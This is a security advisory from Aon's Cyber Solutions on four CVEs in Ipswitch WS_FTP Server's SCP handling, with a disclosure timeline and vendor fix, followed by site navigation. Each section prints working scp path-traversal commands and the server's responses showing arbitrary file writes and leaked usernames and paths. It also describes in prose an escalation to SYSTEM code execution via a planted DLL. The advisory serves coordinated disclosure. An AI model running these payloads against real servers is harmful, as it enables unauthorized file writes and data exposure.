Remote Code Execution and other Vulnerabilities in WS_FTP Server
CVE-2019-12143, CVE-2019-12144, CVE-2019-12145, CVE-2019-12146: Multiple vulnerabilities in Ipswitch’s WS_FTP Server leading to arbitrary file write, remote code execution, and information disclosure.
Aon’s Cyber Solutions recently discovered multiple vulnerabilities in Ipswitch’s WS_FTP Server versions 8.6.0 and below. The issues include:
- An arbitrary file write as the SYSTEM user leading to remote code execution (CVE-2019-12144)
- An arbitrary file write within a server’s FTP root (CVE-2019-12146)
- Multiple information disclosure vulnerabilities (CVE-2019-12143, CVE-2019-12145)
These vulnerabilities all require valid user credentials and only affect the SCP protocol.
Aon would like to thank Ipswitch for working with Aon’s Cyber Labs under our coordinated disclosure process to quickly remediate these vulnerabilities.
Timeline:
04/05/19 – Vulnerabilities disclosed, receipt acknowledged
04/10/19 – Vulnerabilities confirmed
05/29/19 – Version 8.6.1 released containing fixes for all issues
09/18/19 – Aon public disclosure
Credits:
CVE-2019-12144 Dan Bastone
CVE-2019-12146 Devon Greene
CVE-2019-12143 Devon Greene
CVE-2019-12145 Dan Bastone
Vendor Advisory:
https://docs.ipswitch.com/WS_FTP_Server2018/ReleaseNotes/index.htm#49242.htm
CVE-2019-12144: Arbitrary File Write as SYSTEM via Path Traversal
Overview:
The WS_FTP server SCP listener does not adequately validate that supplied filenames do not contain path traversal characters. This allows an authenticated attacker to write files to arbitrary locations on the filesystem with SYSTEM permissions, even when the “Lock User To Home Directory” option is selected. This is demonstrated below by creating the file “c:\test.txt” using SCP, assuming that an attacker has valid credentials for “user1” and the WS_FTP server is listening on host 192.168.194.138.
Exploitation:
$ echo test > \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt
$ scp \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt [email protected]: [email protected]'s password:
\..\..\..\..\..\..\..\..\test.txt 100% 5 0.5KB/s 00:00
The file is present on the server:
C:\>dir /q test.txt
Volume in drive C has no label.
Volume Serial Number is F603-DB19
Directory of C:\
04/03/2019 02:00 PM 5 BUILTIN\Administrators test.txt
1 File(s) 5 Bytes
0 Dir(s) 49,050,906,624 bytes free
C:\>type test.txt
test
Note that the file is owned by an administrative user, demonstrating that this vulnerability allows files to be written anywhere on the filesystem.
This vulnerability can be further leveraged to obtain remote code execution as the SYSTEM user without requiring a reboot. By uploading a malicious DLL file, which is loaded by an IIS worker process used for the WS_FTP administrative interface approximately once every hour, we can obtain NETWORK SERVICE privilege. This level of privilege is sufficient to then add a new WS_FTP system administrator user which can create an FTP SITE command that is run as SYSTEM, resulting in code execution as the SYSTEM user. A fully working proof-of-concept has been developed and will be published at a later date.
CVE-2019-12146: Home Directory Escape via Path Traversal
Overview:
IPSwitch WS_FTP Server v8.6.0 contains a second path traversal vulnerability in the SCP Subsystem allowing authenticated attackers to write files and create directories outside of their home directory into the host’s FTP root. The issue stems from the application improperly resolving destination directories containing 3 or more dot (“.”) characters. This vulnerability exists in the parsing of the destination folder name and is distinct from CVE-2019-12144 above.
Exploitation:
The following commands create a test file and directory, and copies them to the vulnerable server:
$ touch test.txt
$ mkdir test
$ scp -r test.txt test/ [email protected]:.../
A directory listing on the server shows that the file and directory have been placed in the users/ directory, outside of the user’s home directory:
dir /q users/
...SNIP...
<DIR> 0 BUILTIN\Administrators test
0 BUILTIN\ADMINISTRATORS test.txt
CVE-2019-12143: Username and Filename Disclosure via SCP Recursive Download
Authenticated users are able to discover usernames and filenames of other users using SCP recursive downloads along with path traversal and wildcard characters. In the event a user does not have access to a file, a permission denied error followed by the file path is returned in the response.
Exploitation:
In this example, the system contains 3 users – user1, user2, and adminuser. user1 is able to trigger error messages containing the other usernames along with filenames contained in their home directories.
$ scp -r [email protected]:../../*/*/* .
[email protected]'s password:
scp:Permission Denied! /users/adminuser/admintestfile.txt
user1testfile.txt 100% 912 1.6MB/s
scp:Permission Denied! /users/user2/user2testfile.txt
CVE-2019-12145: Path Disclosure via Nonexistent Filenames
Overview:
By using filenames containing backslash characters in a manner similar to CVE-2019-12146, it is possible to cause the WS_FTP Server to return an error message that discloses the full pathname of the FTP root directory. This information may be useful to an attacker attempting to learn more about the filesystem layout to conduct further attacks.
Exploitation:
$ touch \\doesnt\\exist
$ scp \\doesnt\\exist [email protected]:
[email protected]'s password:
scp:Could not find a part of the path 'C:\Program Files (x86)\Ipswitch\WS_FTP Server\WS_FTP Server\[hostname redacted]\users\user1\doesnt\exist'.
Explore More
-
Capability Overview
Cyber Resilience
-
Product / Service
Penetration Testing Services
About Cyber Solutions:
Cyber security services are offered by Stroz Friedberg Inc., its subsidiaries and affiliates. Stroz Friedberg is part of Aon’s Cyber Solutions which offers holistic cyber risk management, unsurpassed investigative skills, and proprietary technologies to help clients uncover and quantify cyber risks, protect critical assets, and recover from cyber incidents.
General Disclaimer
This material has been prepared for informational purposes only and should not be relied on for any other purpose. You should consult with your own professional advisors or IT specialists before implementing any recommendation, following any of the steps or guidance provided herein. Although we endeavor to provide accurate and timely information and use sources that we consider reliable, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future.
Terms of Use
The contents herein may not be reproduced, reused, reprinted or redistributed without the expressed written consent of Aon, unless otherwise authorized by Aon. To use information contained herein, please write to our team.
Aon's Better Being Podcast
Our Better Being podcast series, hosted by Aon Chief Wellbeing Officer Rachel Fellowes, explores wellbeing strategies and resilience. This season we cover human sustainability, kindness in the workplace, how to measure wellbeing, managing grief and more.
Aon Insights Series Asia
Expert Views on Today's Risk Capital and Human Capital Issues
Aon Insights Series Pacific
Expert Views on Today's Risk Capital and Human Capital Issues
Aon Insights Series UK
Expert Views on Today's Risk Capital and Human Capital Issues
Construction and Infrastructure
The construction industry is under pressure from interconnected risks and notable macroeconomic developments. Learn how your organization can benefit from construction insurance and risk management.
Cyber Labs
Stay in the loop on today's most pressing cyber security matters.
Cyber Resilience
Our Cyber Resilience collection gives you access to Aon’s latest insights on the evolving landscape of cyber threats and risk mitigation measures. Reach out to our experts to discuss how to make the right decisions to strengthen your organization’s cyber resilience.
Employee Wellbeing
Our Employee Wellbeing collection gives you access to the latest insights from Aon's human capital team. You can also reach out to the team at any time for assistance with your employee wellbeing needs.
Environmental, Social and Governance Insights
Explore Aon's latest environmental social and governance (ESG) insights.
Q4 2023 Global Insurance Market Insights
Our Global Insurance Market Insights highlight insurance market trends across pricing, capacity, underwriting, limits, deductibles and coverages.
Regional Results
How do the top risks on business leaders’ minds differ by region and how can these risks be mitigated? Explore the regional results to learn more.
Human Capital Analytics
Our Human Capital Analytics collection gives you access to the latest insights from Aon's human capital team. Contact us to learn how Aon’s analytics capabilities helps organizations make better workforce decisions.
Insights for HR
Explore our hand-picked insights for human resources professionals.
Workforce
Our Workforce Collection provides access to the latest insights from Aon’s Human Capital team on topics ranging from health and benefits, retirement and talent practices. You can reach out to our team at any time to learn how we can help address emerging workforce challenges.
Mergers and Acquisitions
Our Mergers and Acquisitions (M&A) collection gives you access to the latest insights from Aon's thought leaders to help dealmakers make better decisions. Explore our latest insights and reach out to the team at any time for assistance with transaction challenges and opportunities.
Navigating Volatility
How do businesses navigate their way through new forms of volatility and make decisions that protect and grow their organizations?
Parametric Insurance
Our Parametric Insurance Collection provides ways your organization can benefit from this simple, straightforward and fast-paying risk transfer solution. Reach out to learn how we can help you make better decisions to manage your catastrophe exposures and near-term volatility.
Pay Transparency and Equity
Our Pay Transparency and Equity collection gives you access to the latest insights from Aon's human capital team on topics ranging from pay equity to diversity, equity and inclusion. Contact us to learn how we can help your organization address these issues.
Property Risk Management
Forecasters are predicting an extremely active 2024 Atlantic hurricane season. Take measures to build resilience to mitigate risk for hurricane-prone properties.
Technology
Our Technology Collection provides access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities of technology. Reach out to the team to learn how we can help you use technology to make better decisions for the future.
Top 10 Global Risks
Trade, technology, weather and workforce stability are the central forces in today’s risk landscape.
Trade
Our Trade Collection gives you access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities for international business. Reach out to our team to understand how to make better decisions around macro trends and why they matter to businesses.
Weather
With a changing climate, organizations in all sectors will need to protect their people and physical assets, reduce their carbon footprint, and invest in new solutions to thrive. Our Weather Collection provides you with critical insights to be prepared.
Workforce Resilience
Our Workforce Resilience collection gives you access to the latest insights from Aon's Human Capital team. You can reach out to the team at any time for questions about how we can assess gaps and help build a more resilience workforce.
More Like This
-
Cyber Labs 3 mins
Responding to the CrowdStrike Outage: Implications for Cyber and Technology Professionals
This client alert provides an overview of the current global IT outage that is related to a CrowdStrike update. We provide an overview of CrowdStrike's response and guidance, and Aon Cyber Solutions' recommendations for affected clients.
-
Cyber Labs 8 mins
A SIMple Attack: A Look Into Recent SIM Swap Attack Trends
Stroz Friedberg Digital Forensics and Incident Response has observed an uptick in SIM swapping across multiple industries, with several recent incidents targeting crypto and crypto-adjacent companies.